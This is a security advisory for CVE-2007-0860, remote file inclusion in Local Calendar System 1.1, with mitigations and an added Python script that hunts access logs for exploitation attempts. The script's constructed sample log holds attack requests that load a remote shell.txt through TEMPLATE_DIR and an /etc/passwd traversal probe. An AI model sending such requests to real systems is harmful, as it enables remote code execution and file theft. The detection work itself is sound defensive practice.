PT-2007-2302 · Local · Local Calendar System

Published

2007-02-09

·

Updated

2024-08-07

·

CVE-2007-0860

CVSS v2.0

7.5

High

Vector

AV:N/AC:L/Au:N/C:P/I:P/A:P
Name of the Vulnerable Software and Affected Versions: Local Calendar System version 1.1
Description: Multiple PHP remote file inclusion vulnerabilities in Local Calendar System 1.1 allow remote attackers to execute arbitrary PHP code via a URL in the TEMPLATE_DIR parameter to showinvoices.php, showmonth.php, showevents.php, retrieveinvoice.php, modifyitem.php and lookup_userid.php, or the LIBDIR parameter to editevent.php, resetpassword.php, signup.php, showmonth.php, showday.php, showevents.php and lookup_userid.php. The attack depends on the request-supplied value reaching an include statement, which happens when the variable is populated from the query string (for example through register_globals) before the script assigns it itself. A third party has disputed the issue, stating that these variables are assigned in config.php before they are used; if that is the case, a value sent in the request is overwritten before the include and the scripts are not exploitable as described.
Recommendations: For Local Calendar System 1.1, no fixed release is known at the time of writing. Until one is available, treat TEMPLATE_DIR and LIBDIR as untrusted and keep request-supplied values away from the include statements in the affected scripts (showinvoices.php, showmonth.php, showevents.php, retrieveinvoice.php, modifyitem.php, lookup_userid.php, editevent.php, resetpassword.php, signup.php and showday.php). Run PHP with register_globals = Off so that query parameters are not turned into variables; set allow_url_include = Off so that include() cannot load a remote URL (on PHP releases before 5.2, where that directive does not exist, allow_url_fopen = Off is the only control); and confirm that config.php assigns both variables before any affected script includes files, which is the condition the dispute relies on. At the web server or a WAF, reject requests to these scripts that carry a TEMPLATE_DIR or LIBDIR query parameter at all, since a legitimate client never needs to send them, and review access logs for past requests in which either parameter contained a URL.
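The log review suggested above, as an added example that is not part of this advisory or of the Local Calendar System code base: a small Python hunt over Common Log Format access-log lines that picks out requests to the scripts named in the description and flags any whose TEMPLATE_DIR or LIBDIR parameter begins with a scheme PHP's include() would fetch. The log lines in SAMPLE_LOG are constructed for illustration (documentation addresses, invented paths); the decision to check both parameters on every listed script, rather than only the per-script pairing the advisory gives, is this example's choice.

```python
"""Hunt access logs for CVE-2007-0860 exploitation attempts against
Local Calendar System 1.1.

Added example, not code from the advisory or from the Local Calendar
System project. Reads Common Log Format lines, picks out requests to the
scripts the advisory lists, and flags any whose TEMPLATE_DIR or LIBDIR
query parameter carries a URL scheme that PHP's include() would fetch,
which is the remote-file-inclusion signature. SAMPLE_LOG is constructed.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Scripts named in the advisory. It pairs TEMPLATE_DIR and LIBDIR with
# particular scripts, but checking both parameters on every listed script
# costs nothing and catches attempts aimed at the "other" variable.
AFFECTED_SCRIPTS = {
    "showinvoices.php", "showmonth.php", "showevents.php",
    "retrieveinvoice.php", "modifyitem.php", "lookup_userid.php",
    "editevent.php", "resetpassword.php", "signup.php", "showday.php",
}

# Exact-case names: register_globals creates PHP variables from query
# parameters case-sensitively, so template_dir=... would not set $TEMPLATE_DIR.
WATCHED_PARAMS = ("TEMPLATE_DIR", "LIBDIR")

# Schemes include() will load as code when allow_url_include (or, on older
# PHP, allow_url_fopen) is on. php:// and data: are stream wrappers that let
# the payload ride in the request body or in the parameter value itself.
REMOTE_SCHEME = re.compile(r"^(?:https?|ftps?|php|data):", re.IGNORECASE)

# Common Log Format: client ident user [time] "METHOD target PROTO" status size
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)


def is_remote_include_value(value: str) -> bool:
    """True if a parameter value starts with a scheme include() would fetch."""
    return bool(REMOTE_SCHEME.match(value))


def classify(line: str):
    """Return a hit dict for an RFI attempt on an affected script, else None."""
    m = CLF.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    script = target.path.rsplit("/", 1)[-1]
    if script not in AFFECTED_SCRIPTS:
        return None
    # parse_qs percent-decodes, so http%3A%2F%2F... is seen as http://...
    query = parse_qs(target.query, keep_blank_values=True)
    for name in WATCHED_PARAMS:
        for value in query.get(name, []):
            if is_remote_include_value(value):
                return {
                    "ip": m.group("ip"),
                    "time": m.group("time"),
                    "script": script,
                    "param": name,
                    "value": value,
                    "status": int(m.group("status")),
                }
    return None


def hunt(log_text: str):
    """Classify every line; return the list of hits in log order."""
    hits = []
    for line in log_text.splitlines():
        hit = classify(line)
        if hit:
            hits.append(hit)
    return hits


# Constructed excerpt. Lines 1, 2 and 4 are exploitation attempts (note the
# percent-encoded URL and the upper-case scheme); line 3 is normal use; line 5
# is a path-traversal probe, which this RFI hunt deliberately does not flag
# because it carries no URL scheme, so local-inclusion probes need their own rule.
SAMPLE_LOG = """\
203.0.113.7 - - [09/Feb/2007:10:15:01 +0000] "GET /lcs/showmonth.php?TEMPLATE_DIR=http%3A%2F%2F198.51.100.5%2Fshell.txt%3F HTTP/1.1" 200 5123
203.0.113.7 - - [09/Feb/2007:10:15:02 +0000] "GET /lcs/signup.php?LIBDIR=ftp://198.51.100.5/pub/ HTTP/1.1" 200 812
198.51.100.23 - - [09/Feb/2007:10:16:44 +0000] "GET /lcs/showmonth.php?month=2&year=2007 HTTP/1.1" 200 7090
198.51.100.23 - - [09/Feb/2007:10:17:00 +0000] "GET /lcs/showday.php?TEMPLATE_DIR=HTTP://198.51.100.5/x HTTP/1.1" 200 3000
198.51.100.23 - - [09/Feb/2007:10:17:30 +0000] "GET /lcs/editevent.php?LIBDIR=../../../../etc/passwd%00 HTTP/1.1" 200 3000
"""

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(f"{hit['time']} {hit['ip']} {hit['script']} {hit['param']}={hit['value']!r}")
```

Feed a real access log through hunt() and each hit records the client, time, script, parameter and the decoded URL, which is what you need to pull the remote payload for analysis. The script cannot tell you whether the include actually executed; a 200 status with an unusual response size on the same line is the usual hint, and the disputed claim that config.php overrides the variables is settled by reading that file on the deployed copy, not by the log.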

Related Identifiers

CVE-2007-0860

Affected Products

Local Calendar System